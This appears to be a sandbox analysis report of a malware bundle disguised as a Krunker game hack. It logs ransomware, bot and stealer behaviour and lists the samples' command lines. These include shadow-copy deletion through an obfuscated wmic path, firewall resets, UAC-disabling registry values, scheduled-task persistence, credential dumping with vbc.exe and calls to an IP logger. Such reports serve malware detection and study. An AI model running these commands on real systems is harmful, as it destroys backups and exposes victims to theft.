N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\PROGRA~3\system.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Token: SeDebugPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2596 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2596 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2596 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2596 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2596 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2596 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2596 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2596 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2596 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2596 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2596 wrote to memory of 4024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2596 wrote to memory of 4024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2596 wrote to memory of 4024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 1676 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 1676 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 1676 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 1676 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 1676 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 1676 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 1916 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1916 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1916 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 2596 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
PID 2596 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
PID 2596 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
PID 764 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 764 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 764 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 3044 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 3044 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 3044 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 4024 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp
PID 4024 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp
PID 4024 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp
PID 1788 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp
PID 1788 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp
PID 1788 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp
PID 1332 wrote to memory of 2492 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 1332 wrote to memory of 2492 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\System32\Conhost.exe
PID 1676 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\System32\Conhost.exe
PID 1676 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\System32\Conhost.exe
PID 1676 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 764 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 764 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 2492 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2492 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2492 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1916 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\10.exe
PID 1916 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\10.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

"x2s443bc.cs1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61B7.tmp\61B8.tmp\61B9.bat C:\Users\Admin\Desktop\1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 184691704838826.bat

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Desktop\10.exe

"C:\Users\Admin\Desktop\10.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5040 -ip 5040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1304 -ip 1304

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 320

C:\Users\Admin\Desktop\6.exe

"C:\Users\Admin\Desktop\6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 324

C:\Users\Admin\Desktop\8.exe

"C:\Users\Admin\Desktop\8.exe"

C:\Users\Admin\Desktop\7.exe

"C:\Users\Admin\Desktop\7.exe"

C:\Users\Admin\Desktop\5.exe

"C:\Users\Admin\Desktop\5.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""

C:\Windows\SysWOW64\wscript.exe

C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s6

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s6

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs

C:\Windows\SysWOW64\wscript.exe

C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe"

C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp" /SL5="$30210,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe

C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp" /SL5="$4022C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\bot.exe'" /rl HIGHEST /f

C:\Users\Admin\Desktop\1.exe

"C:\Users\Admin\Desktop\1.exe"

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

"ska2pwej.aeh.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

"RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\System.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

"bot.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

"4363463463464363463463463.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\bot.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp" /SL5="$4031E,4513031,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DesktopShellAppStateContract\dllhost.exe'" /rl HIGHEST /f

C:\PROGRA~3\system.exe

C:\PROGRA~3\system.exe

C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe

"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -i

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 193

C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe

"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -s

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l41MpFgpBE.bat"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 193

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE

C:\Program Files\Java\jdk-1.8\include\bot.exe

"C:\Program Files\Java\jdk-1.8\include\bot.exe"

C:\Windows\system32\wbem\wmic.exe

"C:\l\..\Windows\dslx\dyx\..\..\system32\el\ggpy\..\..\wbem\mwkh\dtstq\..\..\wmic.exe" shadowcopy delete

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

